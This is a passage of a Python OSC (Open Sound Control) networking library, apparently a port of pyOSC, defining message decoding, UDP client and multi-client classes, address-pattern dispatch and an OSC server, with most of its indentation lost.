typetags = address
address = ""
else:
typetags = ""
if address == "#bundle":
time, rest = _readTimeTag(rest)
decoded.append(address)
decoded.append(time)
while len(rest)>0:
length, rest = _readInt(rest)
decoded.append(decodeOSC(rest[:length]))
rest = rest[length:]
elif len(rest)>0:
if not len(typetags):
typetags, rest = _readString(rest)
decoded.append(address)
decoded.append(typetags)
if typetags.startswith(","):
for tag in typetags[1:]:
value, rest = table[tag](rest)
decoded.append(value)
else:
raise OSCError("OSCMessage's typetag-string lacks the magic ','")
return decoded
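# Illustrative sketch (not part of the original module): round-tripping a
# message through the encoding/decoding helpers above. The address and
# arguments are arbitrary examples.
def _example_encode_decode_roundtrip():
    msg = OSCMessage("/example/addr")
    msg.append(1)          # encoded with typetag 'i'
    msg.append(2.5)        # encoded with typetag 'f'
    msg.append("three")    # encoded with typetag 's'
    # decodeOSC returns [address, typetags, arg1, arg2, ...]
    return decodeOSC(msg.getBinary())   # -> ['/example/addr', ',ifs', 1, 2.5, 'three']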
######
#
# Utility functions
#
######
def hexDump(bytes):
""" Useful utility; prints the string in hexadecimal.
"""
print("byte 0 1 2 3 4 5 6 7 8 9 A B C D E F")
if isinstance(bytes,str):
bytes = bytes.encode('latin1')
num = len(bytes)
for i in range(num):
if (i) % 16 == 0:
line = "%02X0 : " % (i/16)
line += "%02X " % bytes[i]
if (i+1) % 16 == 0:
print("%s: %s" % (line, repr(bytes[i-15:i+1])))
line = ""
bytes_left = num % 16
if bytes_left:
print("%s: %s" % (line.ljust(54), repr(bytes[-bytes_left:])))
def getUrlStr(*args):
"""Convert provided arguments to a string in 'host:port/prefix' format
Args can be:
- (host, port)
- (host, port), prefix
- host, port
- host, port, prefix
"""
if not len(args):
return ""
if type(args[0]) == tuple:
host = args[0][0]
port = args[0][1]
args = args[1:]
else:
host = args[0]
port = args[1]
args = args[2:]
if len(args):
prefix = args[0]
else:
prefix = ""
if len(host) and (host != '0.0.0.0'):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
else:
host = 'localhost'
if isinstance(port,int):
return "%s:%d%s" % (host, port, prefix)
else:
return host + prefix
def parseUrlStr(url):
"""Convert provided string in 'host:port/prefix' format to it's components
Returns ((host, port), prefix)
"""
if not (isinstance(url,str) and len(url)):
return (None, '')
i = url.find("://")
if i > -1:
url = url[i+3:]
i = url.find(':')
if i > -1:
host = url[:i].strip()
tail = url[i+1:].strip()
else:
host = ''
tail = url
for i in range(len(tail)):
if not tail[i].isdigit():
break
else:
i += 1
portstr = tail[:i].strip()
tail = tail[i:].strip()
found = len(tail)
for c in ('/', '+', '-', '*'):
i = tail.find(c)
if (i > -1) and (i < found):
found = i
head = tail[:found].strip()
prefix = tail[found:].strip()
prefix = prefix.strip('/')
if len(prefix) and prefix[0] not in ('+', '-', '*'):
prefix = '/' + prefix
if len(head) and not len(host):
host = head
if len(host):
try:
host = socket.gethostbyname(host)
except socket.error:
pass
try:
port = int(portstr)
except ValueError:
port = None
return ((host, port), prefix)
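# Illustrative sketch (not part of the original module): the two helpers above
# convert between (host, port)/prefix tuples and 'host:port/prefix' strings.
# The host, port and prefix are arbitrary examples.
def _example_url_helpers():
    url = getUrlStr(("192.168.0.10", 9000), "/synth")   # -> e.g. '192.168.0.10:9000/synth'
    addr, prefix = parseUrlStr("192.168.0.10:9000/synth")
    return url, addr, prefix   # addr is ('192.168.0.10', 9000), prefix is '/synth'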
######
#
# OSCClient class
#
######
class OSCClient(object):
"""Simple OSC Client. Handles the sending of OSC-Packets (OSCMessage or OSCBundle) via a UDP-socket
"""
# set outgoing socket buffer size
sndbuf_size = 4096 * 8
def __init__(self, server=None):
"""Construct an OSC Client.
When the 'address' argument is given this client is connected to a specific remote server.
- address ((host, port) tuple): the address of the remote server to send all messages to
Otherwise it acts as a generic client:
If address == 'None', the client doesn't connect to a specific remote server,
and the remote address must be supplied when calling sendto()
- server: Local OSCServer-instance this client will use the socket of for transmissions.
If none is supplied, a socket will be created.
"""
self.socket = None
if server == None:
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self._fd = self.socket.fileno()
self.server = None
else:
self.setServer(server)
self.client_address = None
def setServer(self, server):
"""Associate this Client with given server.
The Client will send from the Server's socket.
The Server will use this Client instance to send replies.
"""
if not isinstance(server, OSCServer):
raise ValueError("'server' argument is not a valid OSCServer object")
if self.socket != None:
self.close()
self.socket = server.socket.dup()
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self._fd = self.socket.fileno()
self.server = server
if self.server.client != None:
self.server.client.close()
self.server.client = self
def close(self):
"""Disconnect & close the Client's socket
"""
if self.socket != None:
self.socket.close()
self.socket = None
def __str__(self):
"""Returns a string containing this Client's Class-name, software-version
and the remote-address it is connected to (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.address()
if addr:
out += " connected to osc://%s" % getUrlStr(addr)
else:
out += " (unconnected)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
isequal = (self.socket == other.socket)
if isequal and self.server and other.server:
return self.server == other.server
return isequal
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
def address(self):
"""Returns a (host,port) tuple of the remote server this client is
connected to or None if not connected to any server.
"""
try:
return self.socket.getpeername()
except socket.error:
return None
def connect(self, address):
"""Bind to a specific OSC server:
the 'address' argument is a (host, port) tuple
- host: hostname of the remote OSC server,
- port: UDP-port the remote OSC server listens to.
"""
try:
self.socket.connect(address)
self.client_address = address
except socket.error as e:
self.client_address = None
raise OSCClientError("SocketError: %s" % str(e))
if self.server != None:
self.server.return_port = address[1]
def sendto(self, msg, address, timeout=None):
"""Send the given OSCMessage to the specified address.
- msg: OSCMessage (or OSCBundle) to be sent
- address: (host, port) tuple specifying remote server to send the message to
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
# print ('in OSC.py the @:',address,'is constitued of a', type(address[0]),'and a',type(address[1]))
try:
self.socket.connect(address)
varAvirer = msg.getBinary()
# print('***',varAvirer,'***')
self.socket.sendall(varAvirer)
if self.client_address:
self.socket.connect(self.client_address)
except socket.error as e:
if e.errno in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending to %s: %s" % (str(address), str(e)))
def send(self, msg, timeout=None):
"""Send the given OSCMessage.
The Client must be already connected.
- msg: OSCMessage (or OSCBundle) to be sent
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket,
or when the Client isn't connected to a remote server.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
self.socket.sendall(msg.getBinary())
except socket.error as e:
if e.errno in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending: %s" % str(e))
######
#
# FilterString Utility functions
#
######
def parseFilterStr(args):
"""Convert Message-Filter settings in '+<addr> -<addr> ...' format to a dict of the form
{ '<addr>':True, '<addr>':False, ... }
Returns a list: ['<prefix>', filters]
"""
out = {}
if isinstance(args,str):
args = [args]
prefix = None
for arg in args:
head = None
for plus in arg.split('+'):
minus = plus.split('-')
plusfs = minus.pop(0).strip()
if len(plusfs):
plusfs = '/' + plusfs.strip('/')
if (head == None) and (plusfs != "/*"):
head = plusfs
elif len(plusfs):
if plusfs == '/*':
out = { '/*':True } # reset all previous filters
else:
out[plusfs] = True
for minusfs in minus:
minusfs = minusfs.strip()
if len(minusfs):
minusfs = '/' + minusfs.strip('/')
if minusfs == '/*':
out = { '/*':False } # reset all previous filters
else:
out[minusfs] = False
if prefix == None:
prefix = head
return [prefix, out]
def getFilterStr(filters):
"""Return the given 'filters' dict as a list of
'+<addr>' | '-<addr>' filter-strings
"""
if not len(filters):
return []
if '/*' in list(filters.keys()):
if filters['/*']:
out = ["+/*"]
else:
out = ["-/*"]
else:
if False in list(filters.values()):
out = ["+/*"]
else:
out = ["-/*"]
for (addr, bool) in list(filters.items()):
if addr == '/*':
continue
if bool:
out.append("+%s" % addr)
else:
out.append("-%s" % addr)
return out
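# Illustrative sketch (not part of the original module): the filter-string
# helpers above translate between the '+<addr> -<addr>' notation and an
# {address: bool} dict. The addresses are arbitrary examples.
def _example_filter_strings():
    prefix, filters = parseFilterStr("/synth -/debug")
    # prefix == '/synth', filters == {'/debug': False}
    return getFilterStr(filters)   # e.g. ['+/*', '-/debug']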
# A translation-table for mapping OSC-address expressions to Python 're' expressions
OSCtrans = str.maketrans("{,}?","(|).")
def getRegEx(pattern):
"""Compiles and returns a 'regular expression' object for the given address-pattern.
"""
# Translate OSC-address syntax to python 're' syntax
pattern = pattern.replace(".", r"\.") # first, escape all '.'s in the pattern.
pattern = pattern.replace("(", r"\(") # escape all '('s.
pattern = pattern.replace(")", r"\)") # escape all ')'s.
pattern = pattern.replace("*", r".*") # replace a '*' by '.*' (match 0 or more characters)
pattern = pattern.translate(OSCtrans) # change '?' to '.' and '{,}' to '(|)'
return re.compile(pattern)
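# Illustrative sketch (not part of the original module): OSC address patterns
# are matched by translating them to regular expressions with getRegEx().
# The pattern and address below are arbitrary examples.
def _example_pattern_match():
    expr = getRegEx("/synth/*")
    addr = "/synth/volume"
    match = expr.match(addr)
    return bool(match) and match.end() == len(addr)   # True: full-address match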
######
#
# OSCMultiClient class
#
######
class OSCMultiClient(OSCClient):
"""'Multiple-Unicast' OSC Client. Handles the sending of OSC-Packets (OSCMessage or OSCBundle) via a UDP-socket
This client keeps a dict of 'OSCTargets', and sends each OSCMessage to each OSCTarget.
The OSCTargets are simply (host, port) tuples, and may be associated with an OSC-address prefix.
the OSCTarget's prefix gets prepended to each OSCMessage sent to that target.
"""
def __init__(self, server=None):
"""Construct a "Multi" OSC Client.
- server: Local OSCServer-instance this client will use the socket of for transmissions.
If none is supplied, a socket will be created.
"""
super(OSCMultiClient, self).__init__(server)
self.targets = {}
def _searchHostAddr(self, host):
"""Search the subscribed OSCTargets for (the first occurence of) given host.
Returns a (host, port) tuple
"""
try:
host = socket.gethostbyname(host)
except socket.error:
pass
for addr in list(self.targets.keys()):
if host == addr[0]:
return addr
raise NotSubscribedError((host, None))
def _updateFilters(self, dst, src):
"""Update a 'filters' dict with values form another 'filters' dict:
- src[a] == True and dst[a] == False: del dst[a]
- src[a] == False and dst[a] == True: del dst[a]
- a not in dst: dst[a] == src[a]
"""
if '/*' in list(src.keys()): # reset filters
dst.clear() # 'match everything' == no filters
if not src.pop('/*'):
dst['/*'] = False # 'match nothing'
for (addr, bool) in list(src.items()):
if (addr in list(dst.keys())) and (dst[addr] != bool):
del dst[addr]
else:
dst[addr] = bool
def _setTarget(self, address, prefix=None, filters=None):
"""Add (i.e. subscribe) a new OSCTarget, or change the prefix for an existing OSCTarget.
- address ((host, port) tuple): IP-address & UDP-port
- prefix (string): The OSC-address prefix prepended to the address of each OSCMessage
sent to this OSCTarget (optional)
"""
if address not in list(self.targets.keys()):
self.targets[address] = ["",{}]
if prefix != None:
if len(prefix):
# make sure prefix starts with ONE '/', and does not end with '/'
prefix = '/' + prefix.strip('/')
self.targets[address][0] = prefix
if filters != None:
if isinstance(filters,str):
(_, filters) = parseFilterStr(filters)
elif not isinstance(filters,dict):
raise TypeError("'filters' argument must be a dict with {addr:bool} entries")
self._updateFilters(self.targets[address][1], filters)
def setOSCTarget(self, address, prefix=None, filters=None):
"""Add (i.e. subscribe) a new OSCTarget, or change the prefix for an existing OSCTarget.
the 'address' argument can be a ((host, port) tuple) : The target server address & UDP-port
or a 'host' (string) : The host will be looked-up
- prefix (string): The OSC-address prefix prepended to the address of each OSCMessage
sent to this OSCTarget (optional)
"""
if isinstance(address,str):
address = self._searchHostAddr(address)
elif (isinstance(address,tuple)):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except:
pass
address = (host, port)
else:
raise TypeError("'address' argument must be a (host, port) tuple or a 'host' string")
self._setTarget(address, prefix, filters)
def setOSCTargetFromStr(self, url):
"""Adds or modifies a subscribed OSCTarget from the given string, which should be in the
'<host>:<port>[/<prefix>] [+/<filter>]|[-/<filter>] ...' format.
"""
(addr, tail) = parseUrlStr(url)
(prefix, filters) = parseFilterStr(tail)
self._setTarget(addr, prefix, filters)
def _delTarget(self, address, prefix=None):
"""Delete the specified OSCTarget from the Client's dict.
the 'address' argument must be a (host, port) tuple.
If the 'prefix' argument is given, the Target is only deleted if the address and prefix match.
"""
try:
if prefix == None:
del self.targets[address]
elif prefix == self.targets[address][0]:
del self.targets[address]
except KeyError:
raise NotSubscribedError(address, prefix)
def delOSCTarget(self, address, prefix=None):
"""Delete the specified OSCTarget from the Client's dict.
the 'address' argument can be a ((host, port) tuple), or a hostname.
If the 'prefix' argument is given, the Target is only deleted if the address and prefix match.
"""
if isinstance(address,str):
address = self._searchHostAddr(address)
if isinstance(address,tuple):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
self._delTarget(address, prefix)
def hasOSCTarget(self, address, prefix=None):
"""Return True if the given OSCTarget exists in the Client's dict.
the 'address' argument can be a ((host, port) tuple), or a hostname.
If the 'prefix' argument is given, the return-value is only True if the address and prefix match.
"""
if isinstance(address,str):
address = self._searchHostAddr(address)
if isinstance(address,tuple):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
if address in list(self.targets.keys()):
if prefix == None:
return True
elif prefix == self.targets[address][0]:
return True
return False
def getOSCTargets(self):
"""Returns the dict of OSCTargets: {addr:[prefix, filters], ...}
"""
out = {}
for ((host, port), pf) in list(self.targets.items()):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
out[(host, port)] = pf
return out
def getOSCTarget(self, address):
"""Returns the OSCTarget matching the given address as a ((host, port), [prefix, filters]) tuple.
'address' can be a (host, port) tuple, or a 'host' (string), in which case the first matching OSCTarget is returned
Returns (None, ['',{}]) if address not found.
"""
if isinstance(address,str):
address = self._searchHostAddr(address)
if (isinstance(address,tuple)):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
if (address in list(self.targets.keys())):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
return ((host, port), self.targets[address])
return (None, ['',{}])
def clearOSCTargets(self):
"""Erases all OSCTargets from the Client's dict
"""
self.targets = {}
def updateOSCTargets(self, dict):
"""Update the Client's OSCTargets dict with the contents of 'dict'
The given dict's items MUST be of the form
{ (host, port):[prefix, filters], ... }
"""
for ((host, port), (prefix, filters)) in list(dict.items()):
val = [prefix, {}]
self._updateFilters(val[1], filters)
try:
host = socket.gethostbyname(host)
except socket.error:
pass
self.targets[(host, port)] = val
def getOSCTargetStr(self, address):
"""Returns the OSCTarget matching the given address as a ('osc://<host>:<port>[<prefix>]', ['<filter-string>', ...])' tuple.
'address' can be a (host, port) tuple, or a 'host' (string), in which case the first matching OSCTarget is returned
Returns (None, []) if address not found.
"""
(addr, (prefix, filters)) = self.getOSCTarget(address)
if addr == None:
return (None, [])
return ("osc://%s" % getUrlStr(addr, prefix), getFilterStr(filters))
def getOSCTargetStrings(self):
"""Returns a list of all OSCTargets as ('osc://<host>:<port>[<prefix>]', ['<filter-string>', ...])' tuples.
"""
out = []
for (addr, (prefix, filters)) in list(self.targets.items()):
out.append(("osc://%s" % getUrlStr(addr, prefix), getFilterStr(filters)))
return out
def connect(self, address):
"""The OSCMultiClient isn't allowed to connect to any specific
address.
"""
return NotImplemented
def sendto(self, msg, address, timeout=None):
"""Send the given OSCMessage.
The specified address is ignored. Instead this method calls send() to
send the message to all subscribed clients.
- msg: OSCMessage (or OSCBundle) to be sent
- address: (host, port) tuple specifying remote server to send the message to
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
self.send(msg, timeout)
def _filterMessage(self, filters, msg):
"""Checks the given OSCMessge against the given filters.
'filters' is a dict containing OSC-address:bool pairs.
If 'msg' is an OSCBundle, recursively filters its constituents.
Returns None if the message is to be filtered, else returns the message.
or
Returns a copy of the OSCBundle with the filtered messages removed.
"""
if isinstance(msg, OSCBundle):
out = msg.copy()
msgs = list(out.values())
out.clearData()
for m in msgs:
m = self._filterMessage(filters, m)
if m: # this catches 'None' and empty bundles.
out.append(m)
elif isinstance(msg, OSCMessage):
if '/*' in list(filters.keys()):
if filters['/*']:
out = msg
else:
out = None
elif False in list(filters.values()):
out = msg
else:
out = None
else:
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
expr = getRegEx(msg.address)
for addr in list(filters.keys()):
if addr == '/*':
continue
match = expr.match(addr)
if match and (match.end() == len(addr)):
if filters[addr]:
out = msg
else:
out = None
break
return out
def _prefixAddress(self, prefix, msg):
"""Makes a copy of the given OSCMessage, then prepends the given prefix to
The message's OSC-address.
If 'msg' is an OSCBundle, recursively prepends the prefix to its constituents.
"""
out = msg.copy()
if isinstance(msg, OSCBundle):
msgs = list(out.values())
out.clearData()
for m in msgs:
out.append(self._prefixAddress(prefix, m))
elif isinstance(msg, OSCMessage):
out.setAddress(prefix + out.address)
else:
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
return out
def send(self, msg, timeout=None):
"""Send the given OSCMessage to all subscribed OSCTargets
- msg: OSCMessage (or OSCBundle) to be sent
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
for (address, (prefix, filters)) in list(self.targets.items()):
if len(filters):
out = self._filterMessage(filters, msg)
if not out: # this catches 'None' and empty bundles.
continue
else:
out = msg
if len(prefix):
out = self._prefixAddress(prefix, msg)
binary = out.getBinary()
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
while len(binary):
sent = self.socket.sendto(binary, address)
binary = binary[sent:]
except socket.error as e:
if e.errno in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending to %s: %s" % (str(address), str(e)))
class OSCAddressSpace:
def __init__(self):
self.callbacks = {}
def addMsgHandler(self, address, callback):
"""Register a handler for an OSC-address
- 'address' is the OSC address-string.
the address-string should start with '/' and may not contain '*'
- 'callback' is the function called for incoming OSCMessages that match 'address'.
The callback-function will be called with the same arguments as the 'msgPrinter_handler' below
"""
for chk in '*?,[]{}# ':
if chk in address:
raise OSCServerError("OSC-address string may not contain any characters in '*?,[]{}# '")
if type(callback) not in (types.FunctionType, types.MethodType):
raise OSCServerError("Message callback '%s' is not callable" % repr(callback))
if address != 'default':
address = '/' + address.strip('/')
self.callbacks[address] = callback
def delMsgHandler(self, address):
"""Remove the registered handler for the given OSC-address
"""
del self.callbacks[address]
def getOSCAddressSpace(self):
"""Returns a list containing all OSC-addresses registerd with this Server.
"""
return list(self.callbacks.keys())
def dispatchMessage(self, pattern, tags, data, client_address):
"""Attmept to match the given OSC-address pattern, which may contain '*',
against all callbacks registered with the OSCServer.
Calls the matching callback and returns whatever it returns.
If no match is found, and a 'default' callback is registered, it calls that one,
or raises NoCallbackError if a 'default' callback is not registered.
- pattern (string): The OSC-address of the received message
- tags (string): The OSC-typetags of the received message's arguments, without ','
- data (list): The message arguments
"""
if len(tags) != len(data):
raise OSCServerError("Malformed OSC-message; got %d typetags [%s] vs. %d values" % (len(tags), tags, len(data)))
expr = getRegEx(pattern)
replies = []
matched = 0
for addr in list(self.callbacks.keys()):
match = expr.match(addr)
if match and (match.end() == len(addr)):
reply = self.callbacks[addr](pattern, tags, data, client_address)
matched += 1
if isinstance(reply, OSCMessage):
replies.append(reply)
elif reply != None:
raise TypeError("Message-callback %s did not return OSCMessage or None: %s" % (self.server.callbacks[addr], type(reply)))
if matched == 0:
if 'default' in self.callbacks:
reply = self.callbacks['default'](pattern, tags, data, client_address)
if isinstance(reply, OSCMessage):
replies.append(reply)
elif reply != None:
raise TypeError("Message-callback %s did not return OSCMessage or None: %s" % (self.server.callbacks['default'], type(reply)))
else:
raise NoCallbackError(pattern)
return replies
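# Illustrative sketch (not part of the original module): registering a callback
# in an OSCAddressSpace and dispatching a decoded message to it by hand
# (normally the OSCServer's request handler does this). Names and values are
# arbitrary examples.
def _example_address_space():
    def volume_handler(addr, tags, data, client_address):
        print("%s -> %s from %s" % (addr, data, client_address))
    space = OSCAddressSpace()
    space.addMsgHandler("/synth/volume", volume_handler)
    # pattern, typetags (without the leading ','), argument list, source address
    return space.dispatchMessage("/synth/volume", "f", [0.5], ("127.0.0.1", 9000))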
######
#
# OSCRequestHandler classes
#
######
class OSCRequestHandler(DatagramRequestHandler):
"""RequestHandler class for the OSCServer
"""
def setup(self):
"""Prepare RequestHandler.
Unpacks request as (packet, source socket address)
Creates an empty list for replies.
"""
(self.packet, self.socket) = self.request
self.replies = []
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function"""
if decoded[0] != "#bundle":
self.replies += self.server.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def handle(self):
"""Handle incoming OSCMessage
"""
decoded = decodeOSC(self.packet)
if not len(decoded):
return
self._unbundle(decoded)
def finish(self):
"""Finish handling OSCMessage.
Send any reply returned by the callback(s) back to the originating client
as an OSCMessage or OSCBundle
"""
if self.server.return_port:
self.client_address = (self.client_address[0], self.server.return_port)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
return
self.server.client.sendto(msg, self.client_address)
class ThreadingOSCRequestHandler(OSCRequestHandler):
"""Multi-threaded OSCRequestHandler;
Starts a new RequestHandler thread for each unbundled OSCMessage
"""
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function
This version starts a new thread for each sub-Bundle found in the Bundle,
then waits for all its children to finish.
"""
if decoded[0] != "#bundle":
self.replies += self.server.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
now = time.time()
children = []
for msg in decoded[2:]:
t = threading.Thread(target = self._unbundle, args = (msg,))
t.start()
children.append(t)
# wait for all children to terminate
for t in children:
t.join()
######
#
# OSCServer classes
#
######
class OSCServer(UDPServer, OSCAddressSpace):
"""A Synchronous OSCServer
Serves one request at-a-time, until the OSCServer is closed.
The OSC address-pattern is matched against a set of OSC-addresses
that have been registered to the server with a callback-function.
If the address-pattern of the message matches the registered address of a callback,
that function is called.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = OSCRequestHandler
# define a socket timeout, so the serve_forever loop can actually exit.
socket_timeout = 1
# DEBUG: print error-tracebacks (to stderr)?
print_tracebacks = False
def __init__(self, server_address, client=None, return_port=0):
"""Instantiate an OSCServer.
- server_address ((host, port) tuple): the local host & UDP-port
the server listens on
- client (OSCClient instance): The OSCClient used to send replies from this server.
If none is supplied (default) an OSCClient will be created.
- return_port (int): if supplied, sets the default UDP destination-port
for replies coming from this server.
"""
UDPServer.__init__(self, server_address, self.RequestHandlerClass)
OSCAddressSpace.__init__(self)
self.setReturnPort(return_port)
self.error_prefix = ""
self.info_prefix = "/info"
self.socket.settimeout(self.socket_timeout)
self.running = False
self.client = None
if client == None:
self.client = OSCClient(server=self)
else:
self.setClient(client)
def setClient(self, client):
"""Associate this Server with a new local Client instance, closing the Client this Server is currently using.
"""
if not isinstance(client, OSCClient):
raise ValueError("'client' argument is not a valid OSCClient object")
if client.server != None:
raise OSCServerError("Provided OSCClient already has an OSCServer-instance: %s" % str(client.server))
# Server socket is already listening at this point, so we can't use the client's socket.
# we'll have to force our socket on the client...
client_address = client.address() # client may be already connected
client.close() # shut-down that socket
# force our socket upon the client
client.socket = self.socket.dup()
client.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, client.sndbuf_size)
client._fd = client.socket.fileno()
client.server = self
if client_address:
client.connect(client_address)
if not self.return_port:
self.return_port = client_address[1]
if self.client != None:
self.client.close()
self.client = client
def serve_forever(self):
"""Handle one request at a time until server is closed."""
self.running = True
while self.running:
self.handle_request() # this times-out when no data arrives.
def close(self):
"""Stops serving requests, closes server (socket), closes used client
"""
self.running = False
self.client.close()
self.server_close()
def __str__(self):
"""Returns a string containing this Server's Class-name, software-version and local bound address (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.address()
if addr:
out += " listening on osc://%s" % getUrlStr(addr)
else:
out += " (unbound)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
# 'cmp' is not available in Python 3 (and returned 0 on equality); compare the sockets directly
return self.socket == other.socket
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
def address(self):
"""Returns a (host,port) tuple of the local address this server is bound to,
or None if not bound to any address.
"""
try:
return self.socket.getsockname()
except socket.error:
return None
def setReturnPort(self, port):
"""Set the destination UDP-port for replies returning from this server to the remote client
"""
if (port > 1024) and (port < 65536):
self.return_port = port
else:
self.return_port = None
def setSrvInfoPrefix(self, pattern):
"""Set the first part of OSC-address (pattern) this server will use to reply to server-info requests.
"""
if len(pattern):
pattern = '/' + pattern.strip('/')
self.info_prefix = pattern
def setSrvErrorPrefix(self, pattern=""):
"""Set the OSC-address (pattern) this server will use to report errors occuring during
received message handling to the remote client.
If pattern is empty (default), server-errors are not reported back to the client.
"""
if len(pattern):
pattern = '/' + pattern.strip('/')
self.error_prefix = pattern
def addDefaultHandlers(self, prefix="", info_prefix="/info", error_prefix="/error"):
"""Register a default set of OSC-address handlers with this Server:
- 'default' -> noCallback_handler
the given prefix is prepended to all other callbacks registered by this method:
- '<prefix><info_prefix>' -> serverInfo_handler
- '<prefix><error_prefix>' -> msgPrinter_handler
- '<prefix>/print' -> msgPrinter_handler
and, if the Client in use supports it:
- '<prefix>/subscribe' -> subscription_handler
- '<prefix>/unsubscribe' -> subscription_handler
Note: the given 'error_prefix' argument is also set as default 'error_prefix' for error-messages
*sent from* this server. This is ok, because error-messages generally do not elicit a reply from the receiver.
To do this with the serverInfo-prefixes would be a bad idea, because if a request received on '/info' (for example)
would send replies to '/info', this could potentially cause a never-ending loop of messages!
Do *not* set the 'info_prefix' here (for incoming serverinfo requests) to the same value as given to
the setSrvInfoPrefix() method (for *replies* to incoming serverinfo requests).
For example, use '/info' for incoming requests, and '/inforeply' or '/serverinfo' or even just '/print' as the
info-reply prefix.
"""
self.error_prefix = error_prefix
self.addMsgHandler('default', self.noCallback_handler)
self.addMsgHandler(prefix + info_prefix, self.serverInfo_handler)
self.addMsgHandler(prefix + error_prefix, self.msgPrinter_handler)
self.addMsgHandler(prefix + '/print', self.msgPrinter_handler)
if isinstance(self.client, OSCMultiClient):
self.addMsgHandler(prefix + '/subscribe', self.subscription_handler)
self.addMsgHandler(prefix + '/unsubscribe', self.subscription_handler)
def printErr(self, txt):
"""Writes 'OSCServer: txt' to sys.stderr
"""
sys.stderr.write("OSCServer: %s\n" % txt)
def sendOSCerror(self, txt, client_address):
"""Sends 'txt', encapsulated in an OSCMessage to the default 'error_prefix' OSC-addres.
Message is sent to the given client_address, with the default 'return_port' overriding
the client_address' port, if defined.
"""
lines = txt.split('\n')
if len(lines) == 1:
msg = OSCMessage(self.error_prefix)
msg.append(lines[0])
elif len(lines) > 1:
msg = OSCBundle(self.error_prefix)
for line in lines:
msg.append(line)
else:
return
if self.return_port:
client_address = (client_address[0], self.return_port)
self.client.sendto(msg, client_address)
def reportErr(self, txt, client_address):
"""Writes 'OSCServer: txt' to sys.stderr
If self.error_prefix is defined, sends 'txt' as an OSC error-message to the client(s)
(see printErr() and sendOSCerror())
"""
self.printErr(txt)
if len(self.error_prefix):
self.sendOSCerror(txt, client_address)
def sendOSCinfo(self, txt, client_address):
"""Sends 'txt', encapsulated in an OSCMessage to the default 'info_prefix' OSC-addres.
Message is sent to the given client_address, with the default 'return_port' overriding
the client_address' port, if defined.
"""
lines = txt.split('\n')
if len(lines) == 1:
msg = OSCMessage(self.info_prefix)
msg.append(lines[0])
elif len(lines) > 1:
msg = OSCBundle(self.info_prefix)
for line in lines:
msg.append(line)
else:
return
if self.return_port:
client_address = (client_address[0], self.return_port)
self.client.sendto(msg, client_address)
###
# Message-Handler callback functions
###
def handle_error(self, request, client_address):
"""Handle an exception in the Server's callbacks gracefully.
Writes the error to sys.stderr and, if the error_prefix (see setSrvErrorPrefix()) is set,
sends the error-message as reply to the client
"""
(e_type, e) = sys.exc_info()[:2]
self.printErr("%s on request from %s: %s" % (e_type.__name__, getUrlStr(client_address), str(e)))
if self.print_tracebacks:
import traceback
traceback.print_exc() # XXX But this goes to stderr!
if len(self.error_prefix):
self.sendOSCerror("%s: %s" % (e_type.__name__, str(e)), client_address)
def noCallback_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registered handlers must accept these four arguments:
- addr (string): The OSC-address pattern of the received Message
